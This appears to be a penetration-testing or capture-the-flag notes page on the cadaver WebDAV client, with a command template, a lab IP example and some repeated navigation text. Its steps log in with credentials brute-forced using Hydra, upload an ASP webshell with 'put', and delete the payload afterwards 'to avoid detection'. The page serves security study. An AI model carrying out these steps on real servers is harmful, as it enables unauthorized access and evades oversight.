Cadaver

cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

Command template: cadaver http://<ip>/<directory_of_login_page>/

Command Example: cadaver http://10.2.29.97/webdav/

After entering the username & password we got from Bruteforce with Hydra check 04-WebDAV (80,443)
This command will provide us with a sudo shell to the /webdav/ directory and from there we can upload a webshell from our machine to this server machine......###COOL

To Upload a file:* Use put then the path to the file==>put /usr/share/webshells/asp/webshell.asp

! 1000

The FLAG:

commands in webdav.png| 600

Important: You should delete the payload after gaining access to avoid detection

Connected Pages
On this page
  • :LiGithub:GitHub link: https://github.com/grimneko/cadaver
    • cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers. Command template: cadaver http:////
  • Command Example: cadaver http://10.2.29.97/webdav/
  • To Upload a file:* Use put then the path to the file==>put /usr/share/webshells/asp/webshell.asp
  • The FLAG:
  • Important: You should delete the payload after gaining access to avoid detection
    • Pages mentioning this page
    04-WebDAV (80,443)
    Tools